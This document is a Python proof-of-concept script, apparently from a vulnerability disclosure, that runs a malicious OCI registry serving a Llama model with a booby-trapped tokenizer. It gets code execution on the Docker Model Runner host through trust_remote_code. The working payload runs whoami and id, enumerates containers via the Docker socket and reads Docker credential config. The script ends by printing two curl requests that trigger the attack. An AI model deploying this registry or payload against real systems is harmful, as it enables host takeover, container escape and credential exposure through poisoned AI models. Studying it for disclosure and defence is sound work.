README.md
Rendering markdown...
#!/usr/bin/env python3
#
# Malicious OCI registry for the Docker Model Runner PoC.
#
# Serves a minimal valid Llama model that contains an evil_tokenizer.py.
# Every blob's declared digest matches its content. A real attacker would
# build it like this. The "no digest verification" claim is proven by static
# analysis (see test_claims.py, claims 1a-1c), not by tampering here.
#
# Introspection endpoints (for the test harness):
# /_poc/health status
# /_poc/digest_map digest -> content mapping with verification
# /_poc/requests request log
# /_poc/selftest verify every blob is internally consistent
import hashlib
import http.server
import json
import os
import struct
import sys
import threading
import time
import traceback
try:
import numpy as np
except ImportError:
print("ERROR: numpy is required. pip install numpy")
sys.exit(1)
PORT = int(os.environ.get("REGISTRY_PORT", "5555"))
REPO = "evil/rce-model"
PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof")
request_log = []
request_log_lock = threading.Lock()
def sha256_digest(data):
return "sha256:" + hashlib.sha256(data).hexdigest()
# Payload: runs on the host when vLLM imports it via trust_remote_code.
EVIL_TOKENIZER_PY = f"""\
import os
import socket
import json
import time
proof = {{
"rce": True,
"hostname": socket.gethostname(),
"user": os.popen("whoami 2>/dev/null").read().strip(),
"uid": os.popen("id 2>/dev/null").read().strip(),
"cwd": os.getcwd(),
"pid": os.getpid(),
"ppid": os.getppid(),
"timestamp": time.time(),
"env_HOME": os.environ.get("HOME", ""),
"model_dir": os.path.dirname(os.path.abspath(__file__)),
"can_read_etc_passwd": os.path.exists("/etc/passwd"),
"can_write_tmp": os.access("/tmp", os.W_OK),
}}
# Container escape proof. We're on the host, so if the Docker socket is
# reachable we control the whole daemon: enumerate, exec, create new
# containers. unpriv container -> host RCE -> daemon -> any container.
docker_socket = "/var/run/docker.sock"
proof["docker_socket_exists"] = os.path.exists(docker_socket)
proof["docker_socket_writable"] = os.access(docker_socket, os.W_OK)
docker_ps = os.popen("docker ps --format '{{{{.ID}}}} {{{{.Names}}}} {{{{.Image}}}}' 2>/dev/null").read().strip()
proof["docker_ps"] = docker_ps if docker_ps else None
proof["docker_ps_count"] = len(docker_ps.strip().split("\\n")) if docker_ps.strip() else 0
docker_version = os.popen("docker version --format '{{{{.Server.Version}}}}' 2>/dev/null").read().strip()
proof["docker_version"] = docker_version if docker_version else None
# Don't exfiltrate creds, just prove we could read them.
docker_config_path = os.path.expanduser("~/.docker/config.json")
proof["docker_config_exists"] = os.path.exists(docker_config_path)
if os.path.exists(docker_config_path):
try:
with open(docker_config_path) as dc:
docker_cfg = json.load(dc)
proof["docker_config_has_auths"] = "auths" in docker_cfg
proof["docker_config_registries"] = list(docker_cfg.get("auths", {{}}).keys())
except Exception:
proof["docker_config_has_auths"] = None
try:
with open("{PROOF_FILE}", "w") as f:
json.dump(proof, f, indent=2)
with open("{PROOF_FILE}.flag", "w") as f:
f.write("RCE_CONFIRMED")
except Exception as e:
import sys
print(f"RCE fired but couldn't write proof file: {{e}}", file=sys.stderr)
print(json.dumps(proof), file=sys.stderr)
from transformers import AutoTokenizer
class EvilTokenizer(AutoTokenizer):
pass
""".encode()
# tokenizer_config.json - auto_map points at evil_tokenizer.py.
# This is what triggers the code import under trust_remote_code.
TOKENIZER_CONFIG = json.dumps({
"auto_map": {
"AutoTokenizer": [
"evil_tokenizer.EvilTokenizer",
"evil_tokenizer.EvilTokenizer",
]
},
"tokenizer_class": "EvilTokenizer",
"model_max_length": 2048,
}, indent=2).encode()
# Minimal valid Llama-architecture weights (safetensors)
H, I, V = 64, 128, 32000
TENSORS = {
"model.embed_tokens.weight": (V, H),
"model.layers.0.self_attn.q_proj.weight": (H, H),
"model.layers.0.self_attn.k_proj.weight": (H, H),
"model.layers.0.self_attn.v_proj.weight": (H, H),
"model.layers.0.self_attn.o_proj.weight": (H, H),
"model.layers.0.mlp.gate_proj.weight": (I, H),
"model.layers.0.mlp.up_proj.weight": (I, H),
"model.layers.0.mlp.down_proj.weight": (H, I),
"model.layers.0.input_layernorm.weight": (H,),
"model.layers.0.post_attention_layernorm.weight": (H,),
"model.norm.weight": (H,),
"lm_head.weight": (V, H),
}
def build_safetensors():
parts = []
header = {"__metadata__": {"format": "pt"}}
offset = 0
for name, shape in TENSORS.items():
arr = np.zeros(shape, dtype=np.float32)
raw = arr.tobytes()
header[name] = {
"dtype": "F32",
"shape": list(shape),
"data_offsets": [offset, offset + len(raw)],
}
parts.append(raw)
offset += len(raw)
hdr = json.dumps(header).encode()
return struct.pack("<Q", len(hdr)) + hdr + b"".join(parts)
SAFETENSORS_BLOB = build_safetensors()
# Standard HF model config
HF_CONFIG = json.dumps({
"architectures": ["LlamaForCausalLM"],
"model_type": "llama",
"hidden_size": H,
"intermediate_size": I,
"num_attention_heads": 2,
"num_hidden_layers": 1,
"num_key_value_heads": 2,
"vocab_size": V,
"max_position_embeddings": 2048,
"torch_dtype": "float32",
"rms_norm_eps": 1e-5,
"rope_theta": 10000.0,
"head_dim": 32,
"mlp_hidden_size": I,
}, indent=2).encode()
# OCI image structure. Every declared digest matches its content.
MODEL_CONFIG = json.dumps({
"config": {
"format": "safetensors",
"architecture": "llama",
"parameters": "1B",
"size": "1B",
},
"rootfs": {
"type": "layers",
"diff_ids": [
sha256_digest(SAFETENSORS_BLOB),
sha256_digest(HF_CONFIG),
sha256_digest(TOKENIZER_CONFIG),
sha256_digest(EVIL_TOKENIZER_PY),
],
},
}).encode()
MANIFEST = json.dumps({
"schemaVersion": 2,
"mediaType": "application/vnd.oci.image.manifest.v1+json",
"config": {
"mediaType": "application/vnd.docker.ai.model.config.v0.1+json",
"digest": sha256_digest(MODEL_CONFIG),
"size": len(MODEL_CONFIG),
},
"layers": [
{
"mediaType": "application/vnd.docker.ai.safetensors",
"digest": sha256_digest(SAFETENSORS_BLOB),
"size": len(SAFETENSORS_BLOB),
"annotations": {"org.cncf.model.filepath": "model.safetensors"},
},
{
"mediaType": "application/vnd.docker.ai.model.file",
"digest": sha256_digest(HF_CONFIG),
"size": len(HF_CONFIG),
"annotations": {"org.cncf.model.filepath": "config.json"},
},
{
"mediaType": "application/vnd.docker.ai.model.file",
"digest": sha256_digest(TOKENIZER_CONFIG),
"size": len(TOKENIZER_CONFIG),
"annotations": {"org.cncf.model.filepath": "tokenizer_config.json"},
},
{
"mediaType": "application/vnd.docker.ai.model.file",
"digest": sha256_digest(EVIL_TOKENIZER_PY),
"size": len(EVIL_TOKENIZER_PY),
"annotations": {"org.cncf.model.filepath": "evil_tokenizer.py"},
},
],
}).encode()
MANIFEST_DIGEST = sha256_digest(MANIFEST)
# digest -> content (each digest matches its content)
BLOBS = {
sha256_digest(MODEL_CONFIG): MODEL_CONFIG,
sha256_digest(SAFETENSORS_BLOB): SAFETENSORS_BLOB,
sha256_digest(HF_CONFIG): HF_CONFIG,
sha256_digest(TOKENIZER_CONFIG): TOKENIZER_CONFIG,
sha256_digest(EVIL_TOKENIZER_PY): EVIL_TOKENIZER_PY,
}
# Human-readable labels for log lines
BLOB_LABELS = {
sha256_digest(MODEL_CONFIG): "model-config",
sha256_digest(SAFETENSORS_BLOB): "model.safetensors",
sha256_digest(HF_CONFIG): "config.json",
sha256_digest(TOKENIZER_CONFIG): "tokenizer_config.json",
sha256_digest(EVIL_TOKENIZER_PY): "evil_tokenizer.py [PAYLOAD]",
}
def selftest():
# Verify each blob's declared digest matches its actual content.
errors = []
for declared_digest, content in BLOBS.items():
actual = sha256_digest(content)
if declared_digest != actual:
errors.append(f"MISMATCH: declared={declared_digest[:32]}... actual={actual[:32]}...")
manifest_data = json.loads(MANIFEST)
config_digest = manifest_data["config"]["digest"]
if config_digest not in BLOBS:
errors.append(f"Manifest config digest {config_digest[:32]}... not in blob store")
for layer in manifest_data["layers"]:
layer_digest = layer["digest"]
if layer_digest not in BLOBS:
errors.append(f"Manifest layer digest {layer_digest[:32]}... not in blob store")
actual_size = len(BLOBS.get(layer_digest, b""))
if layer["size"] != actual_size:
errors.append(f"Layer {layer_digest[:32]}... size mismatch: "
f"manifest={layer['size']} actual={actual_size}")
config_data = json.loads(MODEL_CONFIG)
for diff_id in config_data["rootfs"]["diff_ids"]:
if diff_id not in BLOBS:
errors.append(f"Config diff_id {diff_id[:32]}... not in blob store")
return errors
class Handler(http.server.BaseHTTPRequestHandler):
def log_message(self, fmt, *args):
msg = fmt % args
ts = time.strftime("%H:%M:%S")
label = ""
if "/blobs/" in self.path:
digest = self.path.split("/blobs/")[-1]
label = f" [{BLOB_LABELS.get(digest, 'unknown')}]"
print(f"[{ts}] {self.client_address[0]} {msg}{label}")
with request_log_lock:
request_log.append({
"time": time.time(),
"method": self.command,
"path": self.path,
"client": self.client_address[0],
})
def _respond(self, code, body=b"", content_type="application/json", headers=None):
try:
self.send_response(code)
self.send_header("Content-Type", content_type)
self.send_header("Content-Length", str(len(body)))
for k, v in (headers or {}).items():
self.send_header(k, v)
self.end_headers()
if self.command != "HEAD":
self.wfile.write(body)
except BrokenPipeError:
pass # client gone, normal on HEAD probes
def do_GET(self):
self._route()
def do_HEAD(self):
self._route()
def _route(self):
p = self.path
if p.rstrip("/") == "/v2":
return self._respond(200, b"{}", headers={
"Docker-Distribution-API-Version": "registry/2.0",
})
if p == "/_poc/health":
with request_log_lock:
blob_reqs = [r for r in request_log if "/blobs/" in r["path"]]
manifest_reqs = [r for r in request_log if "/manifests/" in r["path"]]
return self._respond(200, json.dumps({
"status": "ok",
"port": PORT,
"proof_file": PROOF_FILE,
"total_requests": len(request_log),
"manifest_requests": len(manifest_reqs),
"blob_requests": len(blob_reqs),
}, indent=2).encode())
if p == "/_poc/requests":
with request_log_lock:
data = list(request_log)
return self._respond(200, json.dumps(data, indent=2).encode())
if p == "/_poc/selftest":
errors = selftest()
return self._respond(200, json.dumps({
"passed": len(errors) == 0,
"errors": errors,
"blob_count": len(BLOBS),
"manifest_digest": MANIFEST_DIGEST,
}, indent=2).encode())
if p == "/_poc/digest_map":
digest_map = {}
for digest, content in BLOBS.items():
actual = sha256_digest(content)
digest_map[digest] = {
"label": BLOB_LABELS.get(digest, "unknown"),
"declared_digest": digest,
"actual_content_digest": actual,
"matches": digest == actual,
"size": len(content),
}
return self._respond(200, json.dumps(digest_map, indent=2).encode())
if "/manifests/" in p:
return self._respond(200, MANIFEST,
content_type="application/vnd.oci.image.manifest.v1+json",
headers={"Docker-Content-Digest": MANIFEST_DIGEST})
if "/blobs/" in p:
digest = p.split("/blobs/")[-1]
blob = BLOBS.get(digest)
if blob is not None:
return self._respond(200, blob,
content_type="application/octet-stream",
headers={"Docker-Content-Digest": digest})
return self._respond(404, b'{"errors":[{"code":"BLOB_UNKNOWN"}]}')
self._respond(200, b"{}")
def main():
errors = selftest()
if errors:
print("FATAL: registry self-test failed:")
for e in errors:
print(f" {e}")
sys.exit(1)
print("=== Docker Model Runner RCE PoC registry ===")
print(f"Port: {PORT}")
print(f"Proof file: {PROOF_FILE}")
print(f"Blobs: {len(BLOBS)} (all digests consistent)")
print()
print("Model contents:")
for digest, label in BLOB_LABELS.items():
print(f" {digest[:24]}... {label} ({len(BLOBS[digest])} bytes)")
print()
print("Self-test: PASSED")
print()
print("Use it (two requests = host RCE):")
print()
print(f" curl -X POST http://model-runner.docker.internal/api/pull \\")
print(f" -H 'Content-Type: application/json' \\")
print(f" -d '{{\"name\":\"localhost:{PORT}/{REPO}:latest\"}}'")
print()
print(f" curl -X POST http://model-runner.docker.internal/engines/v1/chat/completions \\")
print(f" -H 'Content-Type: application/json' \\")
print(f" -d '{{\"model\":\"localhost:{PORT}/{REPO}:latest\",\"messages\":[{{\"role\":\"user\",\"content\":\"hello\"}}]}}'")
print()
print(f"Then: cat {PROOF_FILE}")
print()
print(f"Listening on 0.0.0.0:{PORT}...")
print()
try:
http.server.HTTPServer(("0.0.0.0", PORT), Handler).serve_forever()
except KeyboardInterrupt:
print("\nShutdown.")
if __name__ == "__main__":
main()